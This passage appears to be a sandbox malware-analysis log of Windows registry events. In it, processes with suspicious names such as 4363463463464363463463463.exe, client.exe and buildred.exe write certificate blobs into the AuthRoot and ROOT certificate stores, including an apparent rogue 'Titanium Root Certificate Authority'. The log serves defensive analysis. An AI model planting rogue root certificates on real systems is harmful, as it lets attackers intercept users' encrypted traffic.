1ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	TPB-1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	client.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	buildred.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	TPB-1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	random.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	client.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	buildred.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	TPB-1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	random.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	client.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	client.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e3